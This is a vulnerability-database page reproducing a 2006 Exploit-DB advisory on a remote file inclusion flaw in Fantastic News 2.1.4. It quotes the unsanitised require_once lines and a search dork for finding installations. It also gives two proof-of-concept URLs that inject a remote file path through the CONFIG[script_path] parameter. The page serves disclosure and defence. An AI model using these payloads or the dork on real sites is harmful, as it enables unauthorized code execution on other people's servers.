Fantastic News - exploit.company

vendor:

Fantastic News

by:

Mr-m07

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Fantastic News

Affected Version From: 2.1.4

Affected Version To: 2.1.4

Patch Exists: NO

Related CWE: N/A

CPE: a:fscripts:fantastic_news:2.1.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2021

Fantastic News <== 2.1.4 (CONFIG[script_path]) Multiple Remote File Include Vulnerabilities

Fantastic News version 2.1.4 is vulnerable to multiple remote file include vulnerabilities. The vulnerable code is present in the archive.php and headlines.php files on lines 16, 17, 18, and 19. An attacker can exploit this vulnerability by sending a malicious URL in the CONFIG[script_path] parameter. This can lead to remote file execution.

Mitigation:

To mitigate this vulnerability, the application should use a whitelist of allowed files and directories and should not allow the inclusion of files from external sources.

Source

Exploit-DB raw data:

+-------------------------------------------------------------------------------------------
+ Fantastic News <== 2.1.4 (CONFIG[script_path]) Multiple Remote File Include Vulnerabilities
+-------------------------------------------------------------------------------------------
+ Vendor ............:  http://fscripts.com
+ Affected Software .: Fantastic News <== 2.1.4
+ Download ..........: http://fscripts.com/download.php?file=1
+ Dork ..............: Powered by Fantastic News v2.1.4
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: Mr-m07 <xp10[at]hotmail.com> Yee7 Team >- WwW.Yee7.com -<
+-------------------------------------------------------------------------------------------
+ Vulnerable Code:
+ =>>archive.php
+
+ on line('s)  16,17,18,19
+  =>>          require_once($CONFIG['script_path']."config.php");
+  =>>          require_once($CONFIG['script_path']."functions/functions.php");
+  =>>          require_once($CONFIG['script_path']."functions/mysql.php");
+  =>>          require_once($CONFIG['script_path']."functions/template.php");
+
+
+ =>>headlines.php
+ on line('s)  16,17,18,19
+  =>>          require_once($CONFIG['script_path']."config.php");
+  =>>          require_once($CONFIG['script_path']."functions/functions.php");
+  =>>          require_once($CONFIG['script_path']."functions/mysql.php");
+  =>>          require_once($CONFIG['script_path']."functions/template.php");
+
+
+ Proof Of Concept:
+ http://[target]/[path]/archive.php?CONFIG[script_path]=http://localhost/a.txt?
+ http://[target]/[path]/headlines.php?CONFIG[script_path]=http://localhost/a.txt?
+
+
+
+
+-------------------------------------------------------------------------------------------
+Thanx To:
+ Yee7 Team http://www.yee7.com
+ Alshikh
+ ShockShadow
+ Mr.HaCkEr
+ StarseviL
+ AssassiN
+ Star Reach
+
+
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-12-27]